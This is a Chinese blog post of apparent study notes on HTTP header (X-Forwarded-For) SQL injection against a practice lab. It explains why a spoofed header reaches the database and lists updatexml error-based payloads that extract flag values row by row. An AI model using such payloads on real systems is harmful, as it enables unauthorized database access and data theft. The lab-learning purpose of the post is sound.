head注入(三)

最新推荐文章于 2024-07-07 08:44:54 发布
最新推荐文章于 2024-07-07 08:44:54 发布
阅读量688 收藏 1
点赞数 2
分类专栏: 笔记 文章标签: SQL注入 head
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/107167006
版权

head(一)
注入环境:http://inject2.lab.aqlab.cn:81/Pass-09/index.php
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
在平时上网冲浪中,我们经常去访问一起网站,比如我们经常访问的百度
但是面对越来越多的用户来访问,如果只有一台服务器,那么肯定会崩掉,
那么就有很多台服务器来处理这些请求,以此来满足用户的需求,

1、通过代理来找到离用户最近的服务器。

你提出请求 > 代理商(CDN)> 最近服务器处理你的请求并返回你想要的数据

服务器只会记录下代理商的ip,而不会记录下你的ip,这就会使得灭有你的ip
为了解决这一问题,X-Forwarded-For就出现了,用来记录你的ip,
然后代理商会在自己的数据包里加上X-Forwarded-For,
这就解决了服务器没有你的ip的问题

2、 负载均衡:A服务器负载满了,那就找一个闲置的服务器

head注入其实就是利用请求头里的数据替换与SQL的源码,从来实现SQL注入
这里我们可以用HTTP_X_FORWARDED_FOR 表示获取客户端的ip
(这里多说一句,这里的自定义函数是遇到匹配的函数就执行,并赋值给 ip这个变量)
在这里插入图片描述
在这里插入图片描述

但是我们截取到的数据包里却没有HTTP_X_FORWARDED_FOR,那我们怎么办?
既然没有,我们就加上

注:浏览器请求头统统都可以加

在这里插入图片描述
在这里插入图片描述
后面的步骤和head(一)一样,这里我就做最后一步。

获取字段值

注意这里因为是用updatexml函数报错输出我们想要的数据,但输出的内容有限,不能输出太多,准确来说应该是每每个输出有限,比如完整的是 qqqqq,wwwww 但可能输出就变成了qqq,www了
所有我们这里不能用group_concat函数一行输出了
这里我们用的是limit函数
'or updatexml(1,concat(0x7e,(select flag_h1 from flag_head limit 0,1)),1),1)#
'or updatexml(1,concat(0x7e,(select flag_h1 from flag_head limit 1,1)),1),1)#
'or updatexml(1,concat(0x7e,(select flag_h1 from flag_head limit 2,1)),1),1)#
'or updatexml(1,concat(0x7e,(select flag_h1 from flag_head limit 3,1)),1),1)#
'or updatexml(1,concat(0x7e,(select flag_h1 from flag_head limit 4,1)),1),1)#
在这里插入图片描述
就是一直替换limit前面的值,来查看所有字段值
就成功了

樱浅沐冰
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入.xmind
05-13
使用思维导图形式,总结分析了常见的SQL注入,盲注、报错注入head注入等等,各个注入相关知识以及方式
HTTP请求头详解
热门推荐
Now . Or Never ``
12-08 12万+
<br /><br />HTTP由两部分组成:请求和响应。当你在Web浏览器中输入一个URL时,浏览器将根据你的要求创建并发送请求,该请求包含所输入的URL以及一些与浏览器本身相关的信息。当服务器收到这个请求时将返回一个响应,该响应包括与该请求相关的信息以及位于指定URL(如果有的话)的数据。直到浏览器解析该响应并显示出网页(或其他资源)为止。<br />HTTP请求<br />HTTP请求的格式如下所示:<br /><request-line><br /><headers><br /><blank lin
python大全-iwanna
Stay foolish, stay kind.
06-30 2041
大家好,我是涵子,今天我要分享一个游戏:iwanna——python版本。
掌控安全 -- header注入
最新发布
qq_53058639的博客
07-07 589
header中获取客户端的一些信息(比如useragent用户代理等其他httpheader字段信息),因为这些信息是会重新返回拼接到后台中的,所以再对这些信息进行sql处理,又因为后台没有进过相对应的信息处理所以构成了sql注入。**总结就是:在传参时,后端为了验证或者获取的一些信息,将这些信息存入到数据库但没有进行相关的处理,所以存在了header注入
head请求_SQL注入-HEAD注入(学习笔记)
weixin_39793638的博客
11-16 237
HEAD注入原理就是在传参的时候,将我们的数据构建在http头部。超全局变量PHP 中的许多预定义变量都是“超全局的”,这意味着它们在一个脚本的全部作用域中都可用。 $_REQUEST (获取GET/POST/COOKIE) COOKIE在新版本已经无法获取了 $_POST (获取POST传参) $_GET (获取GET的传参) $_COOKIE (获取COOKIE的值) $_SERVER (包含...
SQL注入Head注入
Mr.Huang_的博客
08-17 228
Head注入之ip注入 靶场环境:http://inject2.lab.aqlab.cn:81/Pass-09/index.php 在平时上网冲浪中,我们经常去访问一起网站,比如我们经常访问的百度 但是面对越来越多的用户来访问,如果只有一台服务器,那么肯定会崩掉, 那么就有很多台服务器来处理这些请求,以此来满足用户的需求, 1.通过代理来找到离用户最近的服务器。 你提出请求 > 代理商(CDN)> 最近服务器处理你的请求并返回你想要的数据 服务器只会记录下代理商的ip,而不会记录下你的ip,这就
【Linux】命令 - head
学习,记录,总结 的专栏
06-16 346
head 用来显示档案的开头至标准输出中。默认前10行 用法 head [参数] [文件]   主要参数 -q,隐藏文件名 -v,显示文件名 -c ,显示字节数 -n ,显示的行数 举例 head -3 filename: 显示文件第3行的内容 head -n 3 filename: 显示文件前3行的内容 head -n -3 filena
php防注入代码
10-12
就可以做到页面防注入、跨站 如果想整站防注,就在网站的一个公用文件中,如数据库链接文件config.inc.php中! 添加require_once('waf.php');来调用本代码 常用php系统添加文件 PHPCMS V9 \phpcms\base.php PHPWIND...
h5动态注入js代码
09-12
、应用场景 1. 动态加载:根据用户行为或特定条件加载不同的JavaScript库或功能模块,减少页面初始加载时的资源占用。 2. A/B测试:通过注入不同版本的JS代码,对比不同用户体验,进行优化决策。 3. 数据追踪:...
PHP防注入文件
10-13
就可以做到页面防注入、跨站 如果想整站防注,就在网站的一个公用文件中,如数据库链接文件config.inc.php中! 添加require_once('waf.php');来调用本代码 常用php系统添加文件 PHPCMS V9 \phpcms\base.php PHPWIND...
h5页面注入js代码
09-01
首先,我们要理解JavaScript注入的两种主要方式:动态注入和静态注入。静态注入通常是在HTML文件中直接写入`<script>`标签,而动态注入则可能在页面加载后通过DOM操作或AJAX请求来添加脚本。 1. 静态注入: 在HTML...
【Python中pandas库查看df开头和结尾数据】【df.head()和df.tail()方法】
liujingwei8610的专栏
01-31 1万+
● 选择题 以下代码可以查看dataframe中开头3行和结尾3行数据分别是: A df.head(2) df.tail(2) B df.tail(2) df.head(2) C df.head(3) df.tail(3) D df.tail(3) df.head(3) ● 问题解析 1.df.head(n):该方法用于查看dataframe数据表中开头n行的数据,若参数n未设置,即df.head(),则默认查看dataframe中前5行的数据。 2.df.tail(n):该方法用于查看dataframe
渗透测试(Head注入1
Cobb_L
09-01 747
盲注 3 —— 通过Head注入 测试靶场(掌控安全学院SQL注入靶场):https://hack.zkaq.cn/battle/target?id=6b59d4693fb1bfbe 分析:以正确账号密码登录后,网站会记录当前User-Agent,以此尝试是否可以在写入User-Agent时注入SQL 通过BurpSuite抓取包,修改User-Agent,尝试通过updatexml()函数报错来获取一些数据库信息 User-Agent: 'or updatexml(1,concat('~',(s
链表面试题(
iconm的博客
06-03 193
1、判断两个链表是否相交,若相交,求交点。(假设链表不带环) 函数实现的功能为,判断相交,相交返回交点的数据,不相交返回-1。 函数实现源程序 //判断是否相交,不带环 int HasCross(SList *pHead1,SList *pHead2) { SList *pNode1 = pHead1; SList *pNode2 = pHead2; if((p...
curl 命令
weixin_34320159的博客
02-05 195
curl命令是一个利用URL规则在命令行下工作的文件传输工具。它支持文件的上传和下载,所以是综合传输工具,但按传统,习惯称curl为下载工具。作为一款强力工具,curl支持包括HTTP、HTTPS、ftp等众多协议,还支持POST、cookies、认证、从指定偏移处下载部分文件、用户代理字符串、限速、文件大小、进度条等特征。做网页处理流程和数据检索自动化,curl可以祝一臂之...
4.4清北学堂Day1 主要内容:数论,数学
weixin_30481087的博客
04-04 188
Day 1; 1、常见的高精 输入输出都用字符数组; 字符数组的实际长度用strlen()来求; 运算时倒序运算,把每一个字符都-‘0’ 进位的处理上也要注意; 小数减大数时先判断大小然后加负号 只能用while不能用if 因为if只能去掉一个0,while去掉所有的前导零 高精减: 高精乘; 通过逐位相乘,进完位之后输出 ...
渗透测试基础-Head注入
学习、分享、交流
05-16 866
前提:目标网址会记录你的一些head信息,放进数据库,那么只要放进数据库,就说明与数据库产生了交互。 --> 可能就存在数据库注入漏洞。
head 注入
晨辰.的博客
03-21 5460
Head 注入
入门Pandas不可不知的技巧
Python数据之道
04-27 408
来源:Python数据之道作者:Peter整理:阳哥大家好,我是阳哥。今天来跟大家分享 Pandas 的一些常用知识点,文章内容由公众号读者 Peter 创作。如果你用 Python 做数...
深入理解Head First EJB:企业级JavaBean实战
8. **容器服务**:阐述EJB容器提供的服务,如生命周期管理、并发控制、资源注入等,以及如何利用这些服务优化应用程序。 9. **案例研究**:通过实际示例,让读者了解如何设计、实现和部署一个完整的EJB项目。 10. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值